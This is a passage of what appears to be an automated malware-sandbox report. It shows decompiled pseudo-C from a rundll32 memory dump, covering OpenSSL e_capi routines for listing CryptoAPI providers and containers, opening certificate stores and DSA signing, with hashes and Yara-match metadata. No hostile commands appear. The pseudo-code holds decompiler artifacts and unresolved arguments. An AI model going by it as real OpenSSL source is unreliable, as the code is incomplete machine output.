				_t134 =  *0x38903000; // 0x9bfaf736ae76
				_t135 = _t134 ^ _t171;
				 *(_t171 + 0x10) = _t135;
				r9d =  *(__rcx + 0x20);
				_t158 = "Listing containers CSP=%s, type = %d\n";
				_t169 = __rcx;
				 *_t171 = 0;
				r15d = 1;
				E000001C31C33872D790(_t135, _t158,  *((intOrPtr*)(__rcx + 0x18)), __r9);
				if ( *((intOrPtr*)(__rcx + 0x18)) == 0) goto 0x3872fdc8;
				 *((intOrPtr*)(_t173 + 0x28)) = 0;
				r9d = r9d | 0xffffffff;
				 *((long long*)(_t173 + 0x20)) = __rbx;
				_t50 = MultiByteToWideChar(??, ??, ??, ??, ??, ??);
				_t101 = _t50;
				 *(_t171 + 4) = _t101;
				if (_t50 == 0) goto 0x3872fd88;
				_t13 = _t135 + _t135 + 0xf; // 0xf
				if (_t13 - _t135 + _t135 > 0) goto 0x3872fd54;
				E000001C31C33880C220();
				_t174 = _t173 - 0xffffffffffffff0;
				r9d = r9d | 0xffffffff;
				 *(_t174 + 0x28) = _t101;
				_t139 = _t174 + 0x30;
				 *(_t174 + 0x20) = _t139;
				MultiByteToWideChar(??, ??, ??, ??, ??, ??);
				if (_t139 != 0) goto 0x3872fdc8;
				if ( *0x38909020 != 0) goto 0x3872fd9d;
				 *0x38909020 = E000001C31C338721CE0(0xfffffff0);
				 *(_t174 + 0x20) = 0x4ad;
				_t19 = _t158 - 0x2a; // 0x41
				r8d = _t19;
				E000001C31C3387222D0(_t54, 0x6b,  *0x38909020, 0xfffffff0, _t139, 0xffffffffffffff0, _t158, _t169, _t171, "..\\..\\openssl-1.1.0f\\engines\\e_capi.c");
				E000001C31C33872DA10( *0x38909020, 0xfffffff0, _t158);
				goto 0x38730007;
				r9d =  *(_t169 + 0x20);
				 *(_t174 + 0x20) = 0xf0000000;
				__imp__CryptAcquireContextW();
				if (0 != 0) goto 0x3872fe27;
				if ( *0x38909020 != 0) goto 0x3872fdfc;
				 *0x38909020 = E000001C31C338721CE0(0xfffffff0);
				 *(_t174 + 0x20) = 0x4b5;
				_t24 = _t158 - 4; // 0x67
				r8d = _t24;
				E000001C31C3387222D0(_t59, 0x6b,  *0x38909020, 0xfffffff0, _t139, _t171 + 8, _t158, _t169, _t171, "..\\..\\openssl-1.1.0f\\engines\\e_capi.c");
				E000001C31C33872DA10( *0x38909020, 0xfffffff0, _t158);
				goto 0x38730007;
				r8d = 0;
				 *(_t174 + 0x20) = r15d;
				__imp__CryptGetProvParam();
				if (0 != 0) goto 0x3872fe90;
				if ( *0x38909020 != 0) goto 0x3872fe5a;
				 *0x38909020 = E000001C31C338721CE0(0xfffffff0);
				 *(_t174 + 0x20) = 0x4bb;
				r8d = 0x6b;
				E000001C31C3387222D0(_t64, 0x6b,  *0x38909020, 0xfffffff0, _t139,  *((intOrPtr*)(_t171 + 8)), _t158, _t169, _t171, "..\\..\\openssl-1.1.0f\\engines\\e_capi.c");
				E000001C31C33872DA10( *0x38909020, 0xfffffff0, _t158);
				__imp__CryptReleaseContext();
				goto 0x38730007;
				r8d =  *_t171;
				E000001C31C33872D790(0xfffffff0, "Got max container len %d\n", _t139, "..\\..\\openssl-1.1.0f\\engines\\e_capi.c");
				_t160 = "..\\..\\openssl-1.1.0f\\engines\\e_capi.c";
				r8d = 0x4c3;
				_t70 =  ==  ? 0x400 :  *_t171;
				 *_t171 =  ==  ? 0x400 :  *_t171;
				E000001C31C338725700();
				if (0xfffffff0 != 0) goto 0x3872ff08;
				if ( *0x38909020 != 0) goto 0x3872fee4;
				 *0x38909020 = E000001C31C338721CE0(0xfffffff0);
				 *(_t174 + 0x20) = 0x4c5;
				_t31 = _t160 - 0x2a; // 0x41
				r8d = _t31;
				E000001C31C3387222D0(_t72, 0x6b,  *0x38909020, 0xfffffff0, _t139, _t169, "..\\..\\openssl-1.1.0f\\engines\\e_capi.c", _t169, _t171, "..\\..\\openssl-1.1.0f\\engines\\e_capi.c");
				goto 0x3872ffe0;
				asm("o16 nop [eax+eax]");
				_t74 =  *_t171;
				r14d = 0;
				 *(_t171 + 4) = _t74;
				 *0xfffffff0 = 0;
				r14b = 0 == 0;
				 *(_t174 + 0x20) = r14d;
				__imp__CryptGetProvParam();
				if (_t74 == 0) goto 0x3872ff97;
				r9d =  *(_t171 + 4);
				 *(_t174 + 0x28) = r14d;
				 *(_t174 + 0x20) = 0;
				E000001C31C33872D790(0xfffffff0, "Container name %s, len=%d, index=%d, flags=%d\n", 0xfffffff0, _t171 + 4);
				if ( *0xfffffff0 != 0) goto 0x3872ff6d;
				if ( *(_t171 + 4) ==  *_t171) goto 0x3872ff86;
				r8d = 0;
				E000001C31C3387263F0(0xfffffff0, "%lu. %s\n", 0xfffffff0, 0xfffffff0);
				goto 0x3872ff10;
				E000001C31C33872D790(0xfffffff0, "Enumerate bug: using workaround\n", 0xfffffff0, 0xfffffff0);
				goto 0x3872ffe3;
				if (GetLastError() == 0x103) goto 0x3872ffe3;
				if ( *0x38909020 != 0) goto 0x3872ffbb;
				 *0x38909020 = E000001C31C338721CE0(0xfffffff0);
				 *(_t174 + 0x20) = 0x4d6;
				r8d = 0x6b;
				E000001C31C3387222D0(_t81, 0x6b,  *0x38909020, 0xfffffff0, _t139, _t169, "Enumerate bug: using workaround\n", _t169, _t171, "..\\..\\openssl-1.1.0f\\engines\\e_capi.c");
				E000001C31C33872D9B0(_t79,  *0x38909020, 0xfffffff0, "Enumerate bug: using workaround\n");
				r15d = 0;
				r8d = 0x4e7;
				E000001C31C338725750();
				__imp__CryptReleaseContext();
				E000001C31C33880C290();
				return r15d;
			}
















                                        0x1c33872fcbb
                                        0x1c33872fcc0
                                        0x1c33872fcc3
                                        0x1c33872fcc8
                                        0x1c33872fccc
                                        0x1c33872fcd0
                                        0x1c33872fcd4
                                        0x1c33872fcd8
                                        0x1c33872fcdf
                                        0x1c33872fce2
                                        0x1c33872fce6
                                        0x1c33872fcf1
                                        0x1c33872fcf8
                                        0x1c33872fcfb
                                        0x1c33872fd02
                                        0x1c33872fd0a
                                        0x1c33872fd16
                                        0x1c33872fd1c
                                        0x1c33872fd20
                                        0x1c33872fd26
                                        0x1c33872fd2d
                                        0x1c33872fd33
                                        0x1c33872fd35
                                        0x1c33872fd3a
                                        0x1c33872fd41
                                        0x1c33872fd48
                                        0x1c33872fd5b
                                        0x1c33872fd64
                                        0x1c33872fd67
                                        0x1c33872fd6d
                                        0x1c33872fd71
                                        0x1c33872fd78
                                        0x1c33872fd7d
                                        0x1c33872fd86
                                        0x1c33872fd90
                                        0x1c33872fd97
                                        0x1c33872fda2
                                        0x1c33872fdb3
                                        0x1c33872fdb3
                                        0x1c33872fdb7
                                        0x1c33872fdbc
                                        0x1c33872fdc3
                                        0x1c33872fdc8
                                        0x1c33872fdd3
                                        0x1c33872fddd
                                        0x1c33872fde5
                                        0x1c33872fdef
                                        0x1c33872fdf6
                                        0x1c33872fe01
                                        0x1c33872fe12
                                        0x1c33872fe12
                                        0x1c33872fe16
                                        0x1c33872fe1b
                                        0x1c33872fe22
                                        0x1c33872fe2f
                                        0x1c33872fe32
                                        0x1c33872fe3b
                                        0x1c33872fe43
                                        0x1c33872fe4d
                                        0x1c33872fe54
                                        0x1c33872fe5f
                                        0x1c33872fe67
                                        0x1c33872fe73
                                        0x1c33872fe78
                                        0x1c33872fe83
                                        0x1c33872fe8b
                                        0x1c33872fe90
                                        0x1c33872fe9e
                                        0x1c33872fea6
                                        0x1c33872feb4
                                        0x1c33872feba
                                        0x1c33872febf
                                        0x1c33872fec2
                                        0x1c33872fecd
                                        0x1c33872fed7
                                        0x1c33872fede
                                        0x1c33872fee9
                                        0x1c33872fefa
                                        0x1c33872fefa
                                        0x1c33872fefe
                                        0x1c33872ff03
                                        0x1c33872ff0a
                                        0x1c33872ff10
                                        0x1c33872ff17
                                        0x1c33872ff1a
                                        0x1c33872ff1d
                                        0x1c33872ff29
                                        0x1c33872ff32
                                        0x1c33872ff37
                                        0x1c33872ff3f
                                        0x1c33872ff41
                                        0x1c33872ff4c
                                        0x1c33872ff57
                                        0x1c33872ff5b
                                        0x1c33872ff63
                                        0x1c33872ff6b
                                        0x1c33872ff77
                                        0x1c33872ff7d
                                        0x1c33872ff84
                                        0x1c33872ff90
                                        0x1c33872ff95
                                        0x1c33872ffa4
                                        0x1c33872ffae
                                        0x1c33872ffb5
                                        0x1c33872ffc0
                                        0x1c33872ffc8
                                        0x1c33872ffd4
                                        0x1c33872ffdb
                                        0x1c33872ffe0
                                        0x1c33872ffe3
                                        0x1c33872fff3
                                        0x1c33872fffe
                                        0x1c33873000e
                                        0x1c33873002c

                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.779533341.000001C3386E0000.00000040.10000000.00040000.00000000.sdmp, Offset: 000001C3386E0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_1c3386e0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Crypt$Context$ByteCharMultiParamProvReleaseWide$AcquireErrorLast
                                        • String ID: %lu. %s$..\..\openssl-1.1.0f\engines\e_capi.c$Container name %s, len=%d, index=%d, flags=%d$Enumerate bug: using workaround$Got max container len %d$Listing containers CSP=%s, type = %d
                                        • API String ID: 1510837364-3467115363
                                        • Opcode ID: 6244d7be364c79efb0dd520c24c75eb8c735fcfb8e94519efcaaf579a275546e
                                        • Instruction ID: 6d372008419d489b4bb26bd6517de8cf4ff141faea5caac631ddabda196fd43b
                                        • Opcode Fuzzy Hash: 6244d7be364c79efb0dd520c24c75eb8c735fcfb8e94519efcaaf579a275546e
                                        • Instruction Fuzzy Hash: 7DA15E722406C09AF720DF75D844FDA37A2F748798F50E217EA2A8BA95DB38C745C742
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 000001C338730030 Relevance: 21.2, APIs: 4, Strings: 8, Instructions: 150encryptionCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 31%
                                        			E000001C31C338730030(void* __edx, void* __eflags, void* __rax, long long __rbx, void* __rcx, void* __rdx, long long __rsi, void* __r8, void* __r9, long _a8, long _a16, char _a20, char _a24, signed long long _a40, long long _a48, long long _a112) {
				long _v0;
				void* __rbp;
				void* _t28;
				long _t32;
				long _t40;
				void* _t64;
				signed long long _t79;
				long _t81;
				long _t82;
				char* _t107;
				void* _t113;
				long _t128;

				_t120 = __r9;
				_t116 = __r8;
				E000001C31C33880C220();
				_t79 =  *0x38903000; // 0x9bfaf736ae76
				_a40 = _t79 ^ _t113 - __rax;
				_t112 = __rcx;
				E000001C31C33872D790(_t79 ^ _t113 - __rax, "capi_list_providers\n", __r8, __r9);
				E000001C31C3387263F0(_t79 ^ _t113 - __rax, "Available CSPs:\n", _t116, _t120);
				r15d = 0;
				_a112 = __rbx;
				_t64 = r15d;
				_a48 = __rsi;
				asm("o16 nop [eax+eax]");
				r8d = _t64;
				_t28 = E000001C31C33872D790(_t79 ^ _t113 - __rax, "capi_get_provname, index=%d\n", _t116, _t120);
				_t81 =  &_a20;
				r8d = 0;
				_a8 = _t81;
				_v0 = _t128;
				__imp__CryptEnumProvidersW();
				if (_t28 == 0) goto 0x38730229;
				r8d = 0x46c;
				E000001C31C338725700();
				_t84 = _t81;
				if (_t81 == 0) goto 0x387301f3;
				_t82 =  &_a20;
				r8d = 0;
				_a8 = _t82;
				_v0 = _t81;
				__imp__CryptEnumProvidersW();
				if (_t28 == 0) goto 0x3873018b;
				E000001C31C338730FB0(_t82, _t81);
				r8d = 0x47c;
				_t110 = _t82;
				E000001C31C338725750();
				if (_t82 == 0) goto 0x3873029a;
				r9d = _a16;
				E000001C31C33872D790(_t82, "capi_get_provname, returned name=%s, type=%d\n", _t82,  &_a16);
				_v0 = _a16;
				r8d = _t64;
				E000001C31C3387263F0(_t82, "%lu. %s, type %lu\n", _t82, _t82);
				r8d = 0x496;
				E000001C31C338725750();
				goto 0x38730090;
				_t32 = GetLastError();
				r8d = 0x473;
				_t107 = "..\\..\\openssl-1.1.0f\\engines\\e_capi.c";
				E000001C31C338725750();
				if (_t32 == 0x103) goto 0x3873029a;
				if ( *0x38909020 != 0) goto 0x387301c9;
				 *0x38909020 = E000001C31C338721CE0(_t82);
				_v0 = 0x476;
				r8d = 0x68;
				E000001C31C3387222D0(_t34, 0x68,  *0x38909020, _t82, _t81, _t84, _t107, _t110, _t112, "..\\..\\openssl-1.1.0f\\engines\\e_capi.c");
				E000001C31C33872D9B0(_t32,  *0x38909020, _t82, _t107);
				goto 0x3873029a;
				if ( *0x38909020 != 0) goto 0x38730208;
				 *0x38909020 = E000001C31C338721CE0(_t82);
				_v0 = 0x46e;
				_t18 = _t107 - 0x27; // 0x41
				r8d = _t18;
				E000001C31C3387222D0(_t38, 0x68,  *0x38909020, _t82, _t84, _t84, _t107, _t110, _t112, "..\\..\\openssl-1.1.0f\\engines\\e_capi.c");
				goto 0x3873029a;
				_t40 = GetLastError();
				if (_t40 == 0x103) goto 0x3873029a;
				if ( *0x38909020 != 0) goto 0x3873024d;
				 *0x38909020 = E000001C31C338721CE0(_t82);
				_v0 = 0x468;
				r8d = 0x68;
				E000001C31C3387222D0(_t42, 0x68,  *0x38909020, _t82, _t84, _t84, _t107, _t110, _t112, "..\\..\\openssl-1.1.0f\\engines\\e_capi.c");
				r9d = _t40;
				E000001C31C338726420(_t82,  &_a24, _t107, "%lX", "..\\..\\openssl-1.1.0f\\engines\\e_capi.c");
				E000001C31C338721640(2, _t82, "Error code= 0x",  &_a24, "..\\..\\openssl-1.1.0f\\engines\\e_capi.c");
				E000001C31C33880C290();
				return 1;
			}















                                        0x1c338730030
                                        0x1c338730030
                                        0x1c33873003c
                                        0x1c338730044
                                        0x1c33873004e
                                        0x1c338730056
                                        0x1c338730060
                                        0x1c33873006f
                                        0x1c338730074
                                        0x1c338730077
                                        0x1c33873007f
                                        0x1c338730082
                                        0x1c338730087
                                        0x1c338730090
                                        0x1c33873009d
                                        0x1c3387300a2
                                        0x1c3387300a7
                                        0x1c3387300aa
                                        0x1c3387300b6
                                        0x1c3387300bd
                                        0x1c3387300c5
                                        0x1c3387300d6
                                        0x1c3387300dc
                                        0x1c3387300e1
                                        0x1c3387300e7
                                        0x1c3387300ed
                                        0x1c3387300f2
                                        0x1c3387300f5
                                        0x1c338730101
                                        0x1c338730108
                                        0x1c338730110
                                        0x1c338730115
                                        0x1c33873011a
                                        0x1c33873012a
                                        0x1c33873012d
                                        0x1c338730135
                                        0x1c33873013b
                                        0x1c33873014d
                                        0x1c33873015d
                                        0x1c338730167
                                        0x1c33873016a
                                        0x1c33873016f
                                        0x1c33873017f
                                        0x1c338730186
                                        0x1c33873018b
                                        0x1c338730191
                                        0x1c338730197
                                        0x1c3387301a3
                                        0x1c3387301ae
                                        0x1c3387301bc
                                        0x1c3387301c3
                                        0x1c3387301ce
                                        0x1c3387301d6
                                        0x1c3387301e2
                                        0x1c3387301e9
                                        0x1c3387301ee
                                        0x1c3387301fb
                                        0x1c338730202
                                        0x1c33873020d
                                        0x1c33873021e
                                        0x1c33873021e
                                        0x1c338730222
                                        0x1c338730227
                                        0x1c338730229
                                        0x1c338730236
                                        0x1c338730240
                                        0x1c338730247
                                        0x1c338730252
                                        0x1c33873025a
                                        0x1c338730266
                                        0x1c33873026b
                                        0x1c33873027f
                                        0x1c338730295
                                        0x1c3387302b4
                                        0x1c3387302c3

                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.779533341.000001C3386E0000.00000040.10000000.00040000.00000000.sdmp, Offset: 000001C3386E0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_1c3386e0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CryptEnumErrorLastProviders
                                        • String ID: %lX$%lu. %s, type %lu$..\..\openssl-1.1.0f\engines\e_capi.c$Available CSPs:$Error code= 0x$capi_get_provname, index=%d$capi_get_provname, returned name=%s, type=%d$capi_list_providers
                                        • API String ID: 747760079-1615478548
                                        • Opcode ID: 9e42e398c95e5916dc9c00ba49dd46682911d997c13105756202915f125ea00d
                                        • Instruction ID: cdb4e66b3253af64b1549eccb944c197d1ecb8158ee12765436c29bea4c6378c
                                        • Opcode Fuzzy Hash: 9e42e398c95e5916dc9c00ba49dd46682911d997c13105756202915f125ea00d
                                        • Instruction Fuzzy Hash: 62619E723906C082F750DB61E844FDA27A2F788B80F44E127AD694B796DF7CC7858B42
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 000001C33874DED0 Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 97encryptionCOMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.779533341.000001C3386E0000.00000040.10000000.00040000.00000000.sdmp, Offset: 000001C3386E0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_1c3386e0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Crypt$Context$AcquireRandomRelease$CountCounterCurrentGlobalMemoryPerformanceProcessQueryStatusTick
                                        • String ID: @$Intel Hardware Cryptographic Service Provider
                                        • API String ID: 246993173-3158535399
                                        • Opcode ID: b16e02c7c9972d5a65446ae4ebd645c47c437f1e88be2293c061071ba27d192d
                                        • Instruction ID: 71cd0efb329f6032408f63f31fefb06029ed7b4e2168b7d45345949d6a23b221
                                        • Opcode Fuzzy Hash: b16e02c7c9972d5a65446ae4ebd645c47c437f1e88be2293c061071ba27d192d
                                        • Instruction Fuzzy Hash: F141A032255AC082FB51DF21E848BDA6362FBD4740F50E123EDAA8B5A5DF3DC645CB02
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 000001C338730380 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 192encryptionCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 64%
                                        			E000001C31C338730380(void* __rax, long long __rcx, long long __rdx, long long __r8, long long __r9, long long _a8, long long _a16, long long _a24, long long _a32, long long* _a112) {
				void* __rbx;
				void* __rsi;
				void* __rbp;
				void* _t9;
				intOrPtr _t10;
				void* _t15;
				intOrPtr _t17;
				long long _t24;
				void* _t25;

				_t15 = __rax;
				_a32 = __r9;
				_a24 = __r8;
				_a16 = __rdx;
				_a8 = __rcx;
				E000001C31C33880C220();
				_t10 =  *0x388e78c4; // 0xffffffff
				E000001C31C3387311E0(__rax, __rcx);
				 *((long long*)(__r9)) = _t24;
				 *_a112 = _t24;
				_t17 =  *((intOrPtr*)(_t15 + 0x30));
				_t23 =  !=  ? _t17 : "MY";
				_t9 = E000001C31C338730650(_t10, _t17, __r9, _t15,  !=  ? _t17 : "MY", _t24, _t25, __r9);
				if (_t17 != 0) goto 0x38730400;
				return _t9;
			}












                                        0x1c338730380
                                        0x1c338730380
                                        0x1c338730385
                                        0x1c33873038a
                                        0x1c33873038f
                                        0x1c3387303a2
                                        0x1c3387303aa
                                        0x1c3387303ba
                                        0x1c3387303c2
                                        0x1c3387303d7
                                        0x1c3387303da
                                        0x1c3387303e1
                                        0x1c3387303e5
                                        0x1c3387303f0
                                        0x1c3387303ff

                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.779533341.000001C3386E0000.00000040.10000000.00040000.00000000.sdmp, Offset: 000001C3386E0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_1c3386e0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CertStore$CertificatesEnum$CloseOpen
                                        • String ID: ..\..\openssl-1.1.0f\engines\e_capi.c$Can't Parse Certificate %d
                                        • API String ID: 3767857896-627055899
                                        • Opcode ID: 9cbf45b68ae5f2f7670d2f4477fd40b5a2bc759a01f6cb3c21d718e428ffb6e9
                                        • Instruction ID: 8ca775dd87ee44a6086439f58ec87aec87aacbf7fdf509d66de3b01e855a823f
                                        • Opcode Fuzzy Hash: 9cbf45b68ae5f2f7670d2f4477fd40b5a2bc759a01f6cb3c21d718e428ffb6e9
                                        • Instruction Fuzzy Hash: 7C7198323817C486FA54EB16A854FEA6396BB85FC0F44E422DDAD4B756EF38C6418343
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 000001C33872E300 Relevance: 12.5, APIs: 4, Strings: 3, Instructions: 216encryptionCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 42%
                                        			E000001C31C33872E300(void* __edx, void* __eflags, void* __rax, long long __rbx, void* __rcx, long long __rsi, void* __r8, void* __r9, long long _a8, long long _a16, long long _a32, void* _a88) {
				signed long long _v32;
				char _v52;
				signed char _v53;
				signed char _v54;
				signed char _v55;
				signed char _v56;
				signed char _v57;
				signed char _v58;
				signed char _v59;
				signed char _v60;
				signed char _v61;
				signed char _v62;
				signed int _v63;
				signed int _v64;
				signed int _v65;
				signed int _v66;
				signed int _v67;
				signed int _v68;
				signed int _v69;
				signed int _v70;
				signed int _v71;
				signed int _v72;
				char _v80;
				char _v88;
				void* __rbp;
				void* _t95;
				void* _t117;
				void* _t118;
				void* _t147;
				void* _t149;
				signed long long _t167;
				signed long long _t168;
				long long _t171;
				void* _t174;
				char* _t195;
				void* _t203;

				_t199 = __rsi;
				_t149 = __eflags;
				_a16 = __rbx;
				_a32 = __rsi;
				_t202 = _t203;
				E000001C31C33880C220();
				_t167 =  *0x38903000; // 0x9bfaf736ae76
				_t168 = _t167 ^ _t203 - __rax;
				_v32 = _t168;
				_t174 = __r8;
				_t147 = __edx;
				E000001C31C338740300(0x70, __r8);
				E000001C31C3387311E0(_t168, _t168);
				_t195 = "Called CAPI_dsa_do_sign()\n";
				E000001C31C33872D790(_t168, _t195, __r8, __r9);
				E000001C31C338740340(_t149, _t168, _t174, _t174, __rsi, _t203);
				_t175 = _t168;
				if (_t168 != 0) goto 0x3872e3ac;
				if ( *0x38909020 != 0) goto 0x3872e386;
				 *0x38909020 = E000001C31C338721CE0(_t168);
				_a8 = 0x3e3;
				_t5 = _t195 - 0xd; // 0x65
				r8d = _t5;
				E000001C31C3387222D0(_t80, 0x72,  *0x38909020, _t168, _t168, _t174, _t195, __rsi, _t203, "..\\..\\openssl-1.1.0f\\engines\\e_capi.c");
				goto 0x3872e634;
				if (_t147 == 0x14) goto 0x3872e3ec;
				if ( *0x38909020 != 0) goto 0x3872e3c6;
				 *0x38909020 = E000001C31C338721CE0(_t168);
				_a8 = 0x3e8;
				_t7 = _t195 + 0xa; // 0x7c
				r8d = _t7;
				E000001C31C3387222D0(_t84, 0x72,  *0x38909020, _t168, _t168, _t174, _t195, _t199, _t203, "..\\..\\openssl-1.1.0f\\engines\\e_capi.c");
				goto 0x3872e634;
				_t169 =  &_v80;
				r9d = 0;
				_a8 =  &_v80;
				r8d = 0;
				__imp__CryptCreateHash();
				if (0 != 0) goto 0x3872e44e;
				if ( *0x38909020 != 0) goto 0x3872e423;
				 *0x38909020 = E000001C31C338721CE0( &_v80);
				_a8 = 0x3ee;
				_t12 = _t195 - 0xf; // 0x63
				r8d = _t12;
				E000001C31C3387222D0(_t88, 0x72,  *0x38909020,  &_v80, _t168,  *((intOrPtr*)(_t175 + 8)), _t195, _t199, _t203, "..\\..\\openssl-1.1.0f\\engines\\e_capi.c");
				E000001C31C33872DA10( *0x38909020,  &_v80, _t195);
				goto 0x3872e634;
				r9d = 0;
				__imp__CryptSetHashParam();
				if (0 != 0) goto 0x3872e4a4;
				if ( *0x38909020 != 0) goto 0x3872e47b;
				 *0x38909020 = E000001C31C338721CE0(_t169);
				_a8 = 0x3f5;
				_t16 = _t195 - 0xc; // 0x66
				r8d = _t16;
				E000001C31C3387222D0(_t93, 0x72,  *0x38909020, _t169, _t175, _v80, _t195, _t199, _t202, "..\\..\\openssl-1.1.0f\\engines\\e_capi.c");
				_t95 = E000001C31C33872DA10( *0x38909020, _t169, _t195);
				goto 0x3872e619;
				_a16 =  &_v88;
				r9d = 0;
				_t171 =  &_v72;
				_v88 = 0x28;
				r8d = 0;
				_a8 = _t171;
				__imp__CryptSignHashW();
				if (_t95 != 0) goto 0x3872e512;
				_t159 =  *0x38909020;
				if ( *0x38909020 != 0) goto 0x3872e4e9;
				 *0x38909020 = E000001C31C338721CE0(_t171);
				_a8 = 0x3fd;
				_t25 = _t195 - 3; // 0x6f
				r8d = _t25;
				E000001C31C3387222D0(_t97, 0x72,  *0x38909020, _t171, _t175, _v80, _t195, _t199, _t202, "..\\..\\openssl-1.1.0f\\engines\\e_capi.c");
				E000001C31C33872DA10( *0x38909020, _t171, _t195);
				goto 0x3872e619;
				E000001C31C338743D30( *0x38909020, _t171, _t199, _t202);
				_t198 = _t171;
				E000001C31C338743D30(_t159, _t171, _t199, _t202);
				_t176 = _t171;
				if (_t171 == 0) goto 0x3872e609;
				if (_t171 == 0) goto 0x3872e609;
				_v53 = _v72 & 0x000000ff;
				_v72 = _v53 & 0x000000ff;
				_v54 = _v71 & 0x000000ff;
				_v71 = _v54 & 0x000000ff;
				_v55 = _v70 & 0x000000ff;
				_v70 = _v55 & 0x000000ff;
				_v56 = _v69 & 0x000000ff;
				_v69 = _v56 & 0x000000ff;
				_v57 = _v68 & 0x000000ff;
				_v68 = _v57 & 0x000000ff;
				_v58 = _v67 & 0x000000ff;
				_v67 = _v58 & 0x000000ff;
				_v59 = _v66 & 0x000000ff;
				_v66 = _v59 & 0x000000ff;
				_v60 = _v65 & 0x000000ff;
				_v65 = _v60 & 0x000000ff;
				_v61 = _v64 & 0x000000ff;
				_v64 = _v61 & 0x000000ff;
				_v62 = _v63 & 0x000000ff;
				_v63 = _v62 & 0x000000ff;
				E000001C31C338743370(0x14, _t171, _t171,  &_v72, _t202, _t171);
				if (_t171 == 0) goto 0x3872e609;
				r8d = 0x14;
				if (E000001C31C338730F40(_t118, 0x14, _t171, _t171,  &_v52) == 0) goto 0x3872e609;
				E000001C31C338746060(E000001C31C338730F40(_t118, 0x14, _t171, _t171,  &_v52), _t171, _t199, _t202);
				if (_t171 == 0) goto 0x3872e609;
				E000001C31C3387460C0(_t171, _t171, _t171, _t171, _t171, _t176);
				goto 0x3872e619;
				E000001C31C338743B20(_t171, _t198);
				_t117 = E000001C31C338743B20(_t171, _t176);
				E000001C31C33872A640();
				__imp__CryptDestroyHash();
				E000001C31C33880C290();
				return _t117;
			}







































                                        0x1c33872e300
                                        0x1c33872e300
                                        0x1c33872e300
                                        0x1c33872e305
                                        0x1c33872e30e
                                        0x1c33872e316
                                        0x1c33872e31e
                                        0x1c33872e325
                                        0x1c33872e328
                                        0x1c33872e32f
                                        0x1c33872e335
                                        0x1c33872e339
                                        0x1c33872e347
                                        0x1c33872e34c
                                        0x1c33872e356
                                        0x1c33872e364
                                        0x1c33872e369
                                        0x1c33872e36f
                                        0x1c33872e379
                                        0x1c33872e380
                                        0x1c33872e38b
                                        0x1c33872e39c
                                        0x1c33872e39c
                                        0x1c33872e3a0
                                        0x1c33872e3a7
                                        0x1c33872e3af
                                        0x1c33872e3b9
                                        0x1c33872e3c0
                                        0x1c33872e3cb
                                        0x1c33872e3dc
                                        0x1c33872e3dc
                                        0x1c33872e3e0
                                        0x1c33872e3e7
                                        0x1c33872e3f0
                                        0x1c33872e3f4
                                        0x1c33872e3f7
                                        0x1c33872e3fc
                                        0x1c33872e404
                                        0x1c33872e40c
                                        0x1c33872e416
                                        0x1c33872e41d
                                        0x1c33872e428
                                        0x1c33872e439
                                        0x1c33872e439
                                        0x1c33872e43d
                                        0x1c33872e442
                                        0x1c33872e449
                                        0x1c33872e452
                                        0x1c33872e45c
                                        0x1c33872e464
                                        0x1c33872e46e
                                        0x1c33872e475
                                        0x1c33872e480
                                        0x1c33872e491
                                        0x1c33872e491
                                        0x1c33872e495
                                        0x1c33872e49a
                                        0x1c33872e49f
                                        0x1c33872e4ac
                                        0x1c33872e4b1
                                        0x1c33872e4b4
                                        0x1c33872e4b8
                                        0x1c33872e4c2
                                        0x1c33872e4c5
                                        0x1c33872e4ca
                                        0x1c33872e4d2
                                        0x1c33872e4da
                                        0x1c33872e4dc
                                        0x1c33872e4e3
                                        0x1c33872e4ee
                                        0x1c33872e4ff
                                        0x1c33872e4ff
                                        0x1c33872e503
                                        0x1c33872e508
                                        0x1c33872e50d
                                        0x1c33872e512
                                        0x1c33872e517
                                        0x1c33872e51a
                                        0x1c33872e51f
                                        0x1c33872e525
                                        0x1c33872e52e
                                        0x1c33872e544
                                        0x1c33872e54b
                                        0x1c33872e552
                                        0x1c33872e559
                                        0x1c33872e560
                                        0x1c33872e567
                                        0x1c33872e56e
                                        0x1c33872e575
                                        0x1c33872e57c
                                        0x1c33872e583
                                        0x1c33872e58a
                                        0x1c33872e591
                                        0x1c33872e598
                                        0x1c33872e59f
                                        0x1c33872e5a6
                                        0x1c33872e5ad
                                        0x1c33872e5b4
                                        0x1c33872e5bb
                                        0x1c33872e5c2
                                        0x1c33872e5c9
                                        0x1c33872e5cc
                                        0x1c33872e5d4
                                        0x1c33872e5d6
                                        0x1c33872e5ea
                                        0x1c33872e5ec
                                        0x1c33872e5f7
                                        0x1c33872e602
                                        0x1c33872e607
                                        0x1c33872e60c
                                        0x1c33872e614
                                        0x1c33872e622
                                        0x1c33872e62b
                                        0x1c33872e63b
                                        0x1c33872e654

                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.779533341.000001C3386E0000.00000040.10000000.00040000.00000000.sdmp, Offset: 000001C3386E0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_1c3386e0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CryptHash$CreateDestroyParamSign
